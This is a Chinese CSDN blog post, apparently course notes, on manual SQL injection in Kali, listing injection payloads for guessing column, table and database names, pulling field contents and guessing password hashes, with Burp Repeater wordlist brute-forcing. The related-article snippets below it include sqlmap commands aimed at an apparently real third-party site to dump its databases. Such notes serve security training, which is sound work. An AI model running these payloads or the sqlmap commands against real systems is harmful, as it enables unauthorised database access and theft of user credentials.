【Kali Web渗透测试】手动漏洞挖掘—SQL注入 猜测数据库列名、表名、库名、字段内容

最新推荐文章于 2024-03-24 22:07:38 发布
最新推荐文章于 2024-03-24 22:07:38 发布
阅读量3.4k 收藏 2
点赞数 2
分类专栏: SQL注入 文章标签: 课程笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f45646654/article/details/79916041
版权

1. 列名、表名、库名

' and user is null--+

' and table.user is null--+

' and db.table.user is null--+

用burp截获http GET请求,发送到repeater,变量加$, load字典(字典可从kali中获取(find / -name *column*.txt))

' and (select count(*) from table)>0--+    //猜数据库里其它的表

2. 字段内容

' or user = 'admin+   //user字段,user是通过猜列名得到的正确结果

' or user like '%a%   //构造SQL模糊查询语句

3. 猜账号对应密码

' or user='admin' and password='MD5值


Dalvin_jean
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali下的SQL注入(DVWA sql注入 low等级)
weixin_43749051的博客
03-06 2017
(1)在kali下打开浏览器,输入http://192.168.0.184(win7的IP地址)/DVWA/login.php 输入账号密码登录进去,然后点击左侧的“DVWA Security”,选择“low”级别,点击选定。 (2)打开火狐浏览器,添加附件组件tamper data,安装后打开,然后登录dvwa,获取cookie值 (3)获取要测试的url,点击SQL Injection菜单,在输入框输入1,点击submit,获取待测试的url:http://192.168.169.129/dvwa
使用kali完成sql注入
pray030的博客
12-09 8872
使用kali完成sql注入 本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入 前期准备 1.kali虚拟机(自带sql注入所需工具) 2.能够进行注入的网站 实验步骤 1.查看是否可以sql注入 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ GET 2.爆库 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ --dbs 3.查看当前使用的是哪个
sql注入_表名列名字典
05-06
union select * from 表名字典 union select 列名字典 from 表名
sql注入-爆破数据库
最新发布
Eric___Qu的博客
03-24 359
order by原理:会对列排序,当我们输入的列数超过实际拥有的列数,就会提示该列不存在。假设users表里有username,password两个字段。使用order by判断回显后(假设回显结果为2),使用。假设flag数据库里有users表,查看users表。假设需要查看的数据库为flag。
kalisql注入
03-19 648
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的...
用SQL语句怎么查询列名?
热门推荐
仙道喵喵的专栏
01-17 2万+
下面的语句列出指定表的所有列名     select   name   from   syscolumns   where   id=object_id(你要查询的表名)  下面的语句查出当前数据库所有的表和表名等         select   object_name(c.id)   as   表名     ,c.name   as   字段名     ,t.name   数
web渗透测试详细入门实践课程-kali/sql注入
06-20
课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击方式 1. 手动注入:...
Kali Linux Web 渗透测试秘籍
09-26
Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍 Kali Linux Web 渗透测试秘籍
kali_linux渗透测试视频教程(10套教程).txt
04-06
10套独家渗透测试视频教程,熟练掌握Kali_Linux及metasploit渗透测试工具及渗透测试实战技巧,另赠送Kali_Linux web渗透测试实战教材一套,metasploit渗透测试魔鬼训练营教材一套。
Web渗透测试 使用Kali Linux
06-15
使用kali linux做web渗透的经典书籍,外文书籍文翻译。
Kali SQL注入--基于SQLi-Labs
black101的博客
07-20 1853
Kali SQL注入--基于SQLi-LabsSQLi-LabsSQL注入SQL注入的基本原理SQL注入初步实验一个结束语 SQLi-Labs SQLi-Labs是一个练习和理解SQL注入的非常合适的靶站平台,总共有75关,这里我选择它做我的实验环境来对结果进行展示。 SQL注入 SQL注入的基本原理 首先,这不是一篇极为完整的SQL注入整理,这只是一篇对原理的简单复习和介绍。 SQL注入的基本原理 这是正常的SQL语句 select * from user where id = '$id' limit
kali渗透学习-手动sql注入(三)猜测列名表名库名字段内容数据库写入,SQL盲注
weixin_43239236的博客
01-23 398
当无权读取infomation_schema库【MySQL最重要的源数据库,必须有root权限】/拒绝union、order by语句,只有通过暴力猜测进一步的判断sql语句结构 猜列名: ' and coclumn is null--+ (coclumn代表列名字,可以随便搞) 【并且列有一个字段为空,正常执行,若没有空字段,且该列存在,返回空白内容;若列不存在,则报错】(可确定语句可插入数据库运行) 例如:’ and asd is null–+ 使用kali集成的字典文件爆破列名字 对字典
kali linux渗透测试 第二章 sql注入介绍及一个简单的例子
maluxiao123的博客
08-11 595
要学习sql注入首先我们需要sql注入的原理是什么,在日常我们所浏览到的大多数网站,其内容(图片和文字等)很多都是从数据库查询并返回的结果,包括你登录的时候都是使用你输入的帐号密码来对数据库进行查询,查看是否匹配。 而sql注入就是在url或者帐号密码输入框使用sql语句来让过滤不严谨的数据库进行自己想要的执行的sql语句。而要做到上面一点需要我们怎么进行呢。举个简单的例子, 一个id输入框,输入id可查看到firstname和surname两个字段, 第一步也是最重要的一步,我们需要猜测他的.
用sql获取数据库所有的表名的方法:
09-27 777
1、oracle下:select table_name from all_tables; 2、MySQL下:select table_name from information_schema.tables where table_schema='csdb' and table_type='base table'; 3、sql server下:select name from sys.tables...
sql注入3——猜解
网络设备配置-华为
06-06 374
上两节的实验都是我们对数据库有极大的权限去执行的,是一个理想化的状态。但是实际上,即使存在sql注入的漏洞,在用户操作层面的权限肯定不会是root权限。就是information_schema这个库我们无法查询,甚至union、order by等语句也无法使用;即我们无法直接查询到库、表、列等等信息。这个时候我们就需要花费多一点时间和资源去对数据库进行猜解了。 !!!一个存在sql漏洞的页面,在进...
SQL注入讲课准备
weixin_62420492的博客
01-15 536
一.基本函数
【实训04】数据库SQL注入漏洞
qq_62277763的博客
10-17 1765
【实训04】数据库SQL注入漏洞
SQL注入获取数据库名—自动化脚本
weixin_48968378的博客
12-07 2561
1、搭建好python环境,在脚本目录下新建cmd.bat文件(文件内容:cmd.exe)。 2、修改好标志位和payload后,点击cmd.bat进入cmd见面,输入python 文件名运行就OK了。 3、脚本源码: import requests import sys payload='' url='' flag='You are in'#标志位——代表请求是否正确 def StartSqli(url): DBNameLen=0 print('[-]开始获取数据库的长度.
kali web渗透
07-29
这些工具可以帮助你发现Web应用程序的漏洞,如SQL注入、XSS(跨站脚本攻击)、文件包含等。 在进行Web渗透测试之前,你需要首先了解Web应用程序的架构和技术栈。然后,你可以使用Kali Linux的工具来收集目标的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值